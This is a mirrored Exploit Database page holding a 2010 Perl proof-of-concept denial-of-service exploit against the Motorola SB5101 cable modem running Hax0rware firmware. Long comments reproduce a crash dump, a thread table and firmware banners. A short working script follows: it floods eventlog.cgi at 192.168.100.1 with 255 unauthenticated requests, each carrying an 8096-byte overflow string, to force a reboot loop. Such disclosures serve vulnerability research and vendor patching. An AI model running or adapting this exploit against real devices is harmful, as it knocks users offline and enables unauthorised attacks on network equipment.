Motorola SB5101 – Hax0rware Event Reset Remote Overflow

• Exploit Database
• 13 阅读

• 作者： Dillon Beresford
  日期： 2010-06-08
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/13775/

• #!/usr/bin/perl
  
  # Motorola SB5101 Hax0rware Event Reset Remote Overflow
  # Tested on Hax0rware 1.1 R30, R32 and R39
  # Author: Dillon Beresford
  # Date: 6/6/2010
  # Vendor: Motorola Corporation and SBHacker ( SBHacker has been notified of the vuln ).
  # Software Link: http://www.sbhacker.net/forum/index.php
  # Description: Motorola SB5101 Hax0rware Event Reset Remote Buffer Overflow 
  # An unauthenticated attacker could send multiple log reset requests to eventlog.cgi,
  # causing a a denial of service, which would send the cable modem into a reboot loop.
  # For debugging telnet into the device 192.168.100.1 and run the poc.
  
  # >>> YIKES... looks like you may have a problem! <<< 
  
  # r0/zero=00000000 r1/at=80510000 r2/v0=00000000 r3/v1=00000002
  # r4/a0=ac100102 r5/a1=00000000 r6/a2=00000001 r7/a3=8069b914
  # r8/t0=00000001 r9/t1=00000000 r10/t2 =00000001 r11/t3 =00000000
  # r12/t4 =00000000 r13/t5 =00000000 r14/t6 =00000000 r15/t7 =00000005
  # r16/s0 =807bd04c r17/s1 =807bd004 r18/s2 =807bd000 r19/s3 =8069bb90
  # r20/s4 =8069bb88 r21/s5 =11110015 r22/s6 =11110016 r23/s7 =11110017
  # r24/t8 =00000000 r25/t9 =00000009 r26/k0 =807d2698 r27/k1 =8069bc7c
  # r28/gp =80458fa0 r29/sp =8069b910 r30/fp =8069b970 r31/ra =80197d24
  
  # PC : 0x80197e14error addr: 0xac100102
  # cause: 0x00000010status: 0x1000ff03
  
  # BCM interrupt enable: fffffff7, status: 00000000
  # Instruction at PC: 0x8c830000
  
  # entry 80197c58called from 801dbe10
  # entry 801dbd08called from 80242f64
  # entry 80242eb8called from 802fb2e4
  # entry 802fb2accalled from 802fb2a4
  # entry 802fb2acReturn address (00000000) invalid.Trace stops.
  
  # Task: NetToMedia Thread
  # ---------------------------------------------------
  # ID: 0x0025
  # Handle: 0x8069ba24
  # Set Priority: 23
  # Current Priority: 23
  # State:SUSP
  # Stack Base: 0x8069a9b0
  # Stack Size: 4096 bytes
  # Stack Used: 1088 bytes
  # Stack StackStack
  # TaskId TaskNamePriority StateSizeUsed Margin
  # ---------- ------------------------------------------------------------------------
  # 0x8048f818 Idle Thread31 RUN 20481064 984
  # 0x805131d0 Network alarm support 6 SLEEP 225612321024
  # 0x804924c8 Network support 7 SLEEP 819218246368
  # 0x80513f20pthread.0000080015EXIT 785211046748
  # 0x8048a1c8tStartup18 SLEEP1228852087080
  # 0x8054b9ac Rajko HttpD23 SLEEP 328021641116
  # 0x807f579cNonVol Device Async Helper25 SLEEP 3072 5042568
  # 0x807ebc7cMotorola Standby Switch Thread23 SLEEP 4096 4403656
  # 0x807ea984Motorola Vendor Ctl Thread23 SLEEP 4096 5123584
  # 0x807f64e8WDOG17 RUN 512027842336
  # 0x807e8eb0 BFC Ping Thread29 SLEEP 6144 4765668
  # 0x807e870c ConsoleThread27 RUN368642168 34696
  # 0x807d6c58 TelnetD23 RUN 22562040 216
  # 0x807ca564CfgVB Thread23 SLEEP 4096 5163580
  # 0x807c5400DHCM25 SLEEP16384 516 15868
  # 0x807bf390 Event25 SLEEP0 0 0 OVERFLOW
  # 0x8079a900Time Of Day Thread23 SLEEP 6144 4605684
  # 0x8079ad70CmDocsisIpThread23 SLEEP 8192 5087684
  # 0x80793edc CmBpiManagerThd25 SLEEP 8192 5127680
  # 0x8079035c CmDsxHelper23 SLEEP 8192 5087684
  # 0x807ac334 CmDocsisCtlThread21 SLEEP 8192 5167676
  # 0x80789228Scan Downstream Thread23 SLEEP 409614162680
  # 0x80786004RateShaping Thread23 SLEEP 4096 4483648
  # 0x807f65e0CMHL23 SLEEP 4500 3724128
  # 0x807f66d8CMHH21 SLEEP 4500 3564144
  # 0x807f67d0ENRX23 SLEEP 450012483252
  # 0x807f68c8ENTX23 SLEEP 4500 7883712
  # 0x807f69c0ELNK23 SLEEP 4500 3244176
  # 0x807f6ab8USTX23 SLEEP 4500 3444156
  # 0x807f6bb0USRX23 SLEEP 4500 3764124
  # 0x807f6ca8UBCT19 SLEEP 4500 3604140
  # 0x807f6da0USRN23 SLEEP 4500 3444156
  # 0x806a5e18DHCP Client Thread23 SLEEP12288 512 11776
  # 0x807f6e98IpHalIst23 RUN 4500 8163684
  # 0x8069ff7cCmPropaneCtlThread23 SLEEP 819216326560
  # 0x8069d320 IGMP Thread23 SLEEP 4096 4603636
  # 0x8069ba24 NetToMedia Thread23SUSP 409610883008
  # 0x8069798c Trap Thread23 SLEEP16384 504 15880
  # 0x807f6030 SNMP Thread23 SLEEP204801196 19284
  # 0x805aaf20DHCP Server Thread23 SLEEP 819214486744
  # 0x8047b410tNonVolTimer30 SLEEP 2048 2921756
  
  # * *
  #*** ***
  #*** ***
  #*** ***
  # ***** *****
  # ***** *****
  # ***** *****
  #******* *******
  #******* *******
  #******* *******
  # ********* *********
  # ********* *********
  # ******* *******
  #*********
  #*** * ***
  #** **
  # ** **
  # ** **
  #** **
  #* *
  #MotorolaCorporation
  
  # +----------------------------------------------------------------------------+
  # | _/_/ _/_/_/_/_/_/|
  # |_/_/ _/_/_/ Broadband |
  # | _/_/ _/_/|
  # |_/_/ _/_/_/_/ Foundation|
  # | _/_/ _/_/|
  # |_/ _/_/_/_/ Classes |
  # | _/_/_/ _/_/_/|
  # ||
  # | Copyright (c) 1999 - 2007 Broadcom Corporation |
  # ||
  # | Revision:3.9.33.3 RELEASE|
  # ||
  # | Features:Console Nonvol Fat HeapManager SNMP Networking USB1.1 |
  # +----------------------------------------------------------------------------+
  # | Standard Embedded Target Support for BFC |
  # ||
  # | Copyright (c) 2003 - 2007 Broadcom Corporation |
  # ||
  # | Revision:3.0.1 RELEASE |
  # ||
  # | Features:PID=0xc011 Bootloader-Rev=2.1.6d|
  # | Copyright (c) 2003 - 2007 Broadcom Corporation |
  # ||
  # | Revision:3.0.1 RELEASE |
  # ||
  # | Features:PID=0xc011 Bootloader-Rev=2.1.6d|
  # | Features:Bootloader-Compression-Support=0x19 |
  # +----------------------------------------------------------------------------+
  # | eCos BFC Application Layer |
  # ||
  # | Copyright (c) 1999 - 2007 Broadcom Corporation |
  # ||
  # | Revision:3.0.2 RELEASE |
  # ||
  # | Features:eCos Console Cmds, (no Idle Loop Profiler)|
  # +----------------------------------------------------------------------------+
  # | _/_/_/ _/|
  # |_/_/_/_/ _/_/ DOCSIS Cable Modem|
  # | _/_/_/ _/|
  # |_/_/ _/ |
  # | _/_/ _/|
  # |_/_/_/ _/ |
  # | _/_/_/ _/|
  # ||
  # | Copyright (c) 1999 - 2005 Broadcom Corporation |
  # ||
  # | Revision:3.9.33.3 RELEASE|
  # ||
  # | Features:AckCel(tm) DOCSIS 1.0/1.1/2.0 Propane(tm) CM SNMP w/Factory MIB |
  # | Features:Support CM Vendor Extension |
  # +----------------------------------------------------------------------------+
  # | Motorola Data-Only CM Vendor Extension |
  # ||
  # | Revision:3.0.0a RELEASE|
  # ||
  # | Features:DHCP ServerHTTP Server|
  # +----------------------------------------------------------------------------+
  # | Build Date:Apr 29 2009 |
  # | Build Time:15:08:51|
  # | Built By:vobadm02|
  # +----------------------------------------------------------------------------+
  
  use LWP::Simple;
  
  my $junk = "\x31" x 8096;
  
  print "+---------------------------------------------------------------+\n".
  "| Motorola SB5101 Hax0rware Event Reset Remote Overflow |\n".
  "| Motorola: SB5101-2.7.6.0-GA-00-NOSH |\n".
  "| Version: 1.1 R30, R32 and R39 |\n".
  "| Vendor: Motorola Corporation and SBHacker |\n".
  "| Author: Dillon Beresford|\n".
  "| Date: 6/6/2010|\n".
  "+---------------------------------------------------------------+\n";
  
  for ($count = 1; $count < 256; $count++)
  {
  $contents = get("http://192.168.100.1/eventlog.cgi?reset=".$junk);
  print "sending request to cable modem\n";
  }
  
  print "We killed it!\n";